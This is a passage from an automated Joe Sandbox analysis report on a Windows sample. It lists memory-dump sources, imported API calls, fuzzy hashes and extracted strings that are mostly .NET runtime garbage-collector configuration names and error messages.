                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFailFastQueryRaiseVirtual
                                                        • String ID:
                                                        • API String ID: 3307674043-0
                                                        • Opcode ID: 7af0f4953ddc52c25f6e90b158d3ed6bc1e96b3b1330e4a47b64c34ff6aef813
                                                        • Instruction ID: ff04af8c1840643d7f6e7a20b710eae050018c96f0c964c40c65554e219a050d
                                                        • Opcode Fuzzy Hash: 7af0f4953ddc52c25f6e90b158d3ed6bc1e96b3b1330e4a47b64c34ff6aef813
                                                        • Instruction Fuzzy Hash: 2A11C13290878182D794AB35B4002AAB760FB447B0F804336E6FE177C6DF38D1028701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                        • Instruction ID: 1e49f3309228bd225840f00b326803e8f7424a81fab6ef823d7da1eb10f414c2
                                                        • Opcode Fuzzy Hash: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                        • Instruction Fuzzy Hash: 0FB01200F16001C2F3443B337C8270846552B59B02FC41024C608F5250CD2D92EA1B32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                        • API String ID: 0-658696054
                                                        • Opcode ID: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                        • Instruction ID: 18b0670fcd7294d3fce68c276151dc13030b6b09bf7aaaff8d5efaa930e42f5f
                                                        • Opcode Fuzzy Hash: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                        • Instruction Fuzzy Hash: C9325E61618A9682EBA0AB15F890BA9BB64FF4D7C9FC11133D98C17F24DF3CD2128715
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                        • API String ID: 0-2080704861
                                                        • Opcode ID: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                        • Instruction ID: a87d8a1ae34d08393b50fcc3a4ac55ecd678feb2caa63b4a87def7a7bc30c2cb
                                                        • Opcode Fuzzy Hash: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                        • Instruction Fuzzy Hash: C0F1A76092C58790F780FB66ECD52F0BB75AF98312BC54073D04E761669E7CA26AC372
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                        • String ID: SeLockMemoryPrivilege
                                                        • API String ID: 1752251271-475654710
                                                        • Opcode ID: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                        • Instruction ID: f343130d54a8736b299b518e0147f000288a92c76875ad3794a10e72b2a58694
                                                        • Opcode Fuzzy Hash: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                        • Instruction Fuzzy Hash: B231D432A1C64285F7A0AB72B44437AEFB1EB84B84F841136DA4D5BB54DF3DD1498B21
                                                        APIs
                                                        • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7E3578880,?,?,?,?,?,?,?,?,?), ref: 00007FF7E3577F4B
                                                        • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7E3578880,?,?,?,?,?,?,?,?,?), ref: 00007FF7E35780AA
                                                        • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7E3578880,?,?,?,?,?,?,?,?,?), ref: 00007FF7E35781A0
                                                        • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7E3578880,?,?,?,?,?,?,?,?,?), ref: 00007FF7E35781B6
                                                        • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7E3578880,?,?,?,?,?,?,?,?,?), ref: 00007FF7E3578216
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFailFastRaise
                                                        • String ID: [ KeepUnwinding ]
                                                        • API String ID: 2546344036-400895726
                                                        • Opcode ID: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                        • Instruction ID: 1f957e04aa4096a71817a5f033ac66ed7167b0b99f5dc3135e2c1b9bf5359443
                                                        • Opcode Fuzzy Hash: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                        • Instruction Fuzzy Hash: 59C19E72A09B4281EB94AF34D4813B97BA1FB44B49F984137CE4D1B398DF39E595C322
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                        • Instruction ID: a39127b6d2434c80c949f3906bb296b53654efcc4870bee35aa9a24764017864
                                                        • Opcode Fuzzy Hash: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                        • Instruction Fuzzy Hash: 52119A22B04F058AEB40DF71E8543B877A4FB19758F801E32EA2D927A4DF78E1688350
                                                        APIs
                                                        Strings
                                                        • The required instruction sets are not supported by the current CPU., xrefs: 00007FF7E357556E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFailFastRaise
                                                        • String ID: The required instruction sets are not supported by the current CPU.
                                                        • API String ID: 2546344036-3318624164
                                                        • Opcode ID: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
                                                        • Instruction ID: b9c78d2891e72f5354f4207467247e5a3c6bb75c7ae66f22688aaff6528ae6ec
                                                        • Opcode Fuzzy Hash: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
                                                        • Instruction Fuzzy Hash: 59716370B2823646F7E46B295885B34BEA26F1534BFD0087AD40D67BA1CD3D77604B63
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                        • String ID:
                                                        • API String ID: 4239280443-0
                                                        • Opcode ID: e96f7d281132337fea8e7f377ba37c97c6aba31005ca11e535279debe24b78da
                                                        • Instruction ID: 782a562bfbe5c99fa35841ac14646b8355d2d7b99366b9bf9b20a136895b572b
                                                        • Opcode Fuzzy Hash: e96f7d281132337fea8e7f377ba37c97c6aba31005ca11e535279debe24b78da
                                                        • Instruction Fuzzy Hash: 18420931918B8685F780AB24E8C0374BBA4FB5D746F91523AD98C32765DF3CA1B0D762
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                        • Instruction ID: 847854bfa10549116791db2f91d5f8472d35038b465ff0a23221493f9d71f784
                                                        • Opcode Fuzzy Hash: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                        • Instruction Fuzzy Hash: 6B52F932A18B8686EB909F15E890378BFA1FB49791F840533C96D67794DF3CE560D322
                                                        Strings
                                                        • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF7E35986FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
                                                        • API String ID: 0-2256439813
                                                        • Opcode ID: 50da1d7dbb71d666163056a1c3305b8d57314540a6760d0100d8d9bcf4b189ee
                                                        • Instruction ID: daeb53e87f7f6315a11907f0490e50074b1f8739817a616442bceb9a021f7792
                                                        • Opcode Fuzzy Hash: 50da1d7dbb71d666163056a1c3305b8d57314540a6760d0100d8d9bcf4b189ee
                                                        • Instruction Fuzzy Hash: 7A42D831A09B8686EA95AB29D480375BBB0FF08786F944137CA5D27361DF3DE071C762
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ?
                                                        • API String ID: 0-1684325040
                                                        • Opcode ID: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                        • Instruction ID: bc435f49168cc7df2a6c51796cf89871fc4671d0ac7b9e20d328ae8790ec75d8
                                                        • Opcode Fuzzy Hash: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                        • Instruction Fuzzy Hash: B6120432A08B8281EA90EF21E444779FBA4FB85B94FA44232CE5D6B794CF3CE451C751
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CounterPerformanceQuery
                                                        • String ID:
                                                        • API String ID: 2783962273-3916222277
                                                        • Opcode ID: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                        • Instruction ID: a817e5417ff8b7f4a29553b91c5ad5fb2a16eba2cc34666b5e38be24fd77c50f
                                                        • Opcode Fuzzy Hash: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                        • Instruction Fuzzy Hash: BBD1D6A2A18A8681EB80EB39E450379BB90FB45BA4F944333DA7D277D4DF3CE4518351
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb7677469dab8905c15279e3cad53667b5c7cafe09fa7859a7ab39fefe507f69
                                                        • Instruction ID: ee006c568068348062c5e791181136d7914c00ec78adc07c790c16df7771063e
                                                        • Opcode Fuzzy Hash: fb7677469dab8905c15279e3cad53667b5c7cafe09fa7859a7ab39fefe507f69
                                                        • Instruction Fuzzy Hash: 1592D121F18B4685EA91BB65A8817B4FBA1AF48BC6FC44537DC0E77360DE3DE4518322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d806a328222a3d6a213ff637029bd3ca24401f5508e472075109ba4d02c0c2b8
                                                        • Instruction ID: 273da5e3ad4f810c4770e177cdaff4517617cdeb275c82f5267837fe912c1ff5
                                                        • Opcode Fuzzy Hash: d806a328222a3d6a213ff637029bd3ca24401f5508e472075109ba4d02c0c2b8
                                                        • Instruction Fuzzy Hash: 8462B161A1874686FB95AB399580335FFA1BF49781FD08137D91E73350DF3CE8608A22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
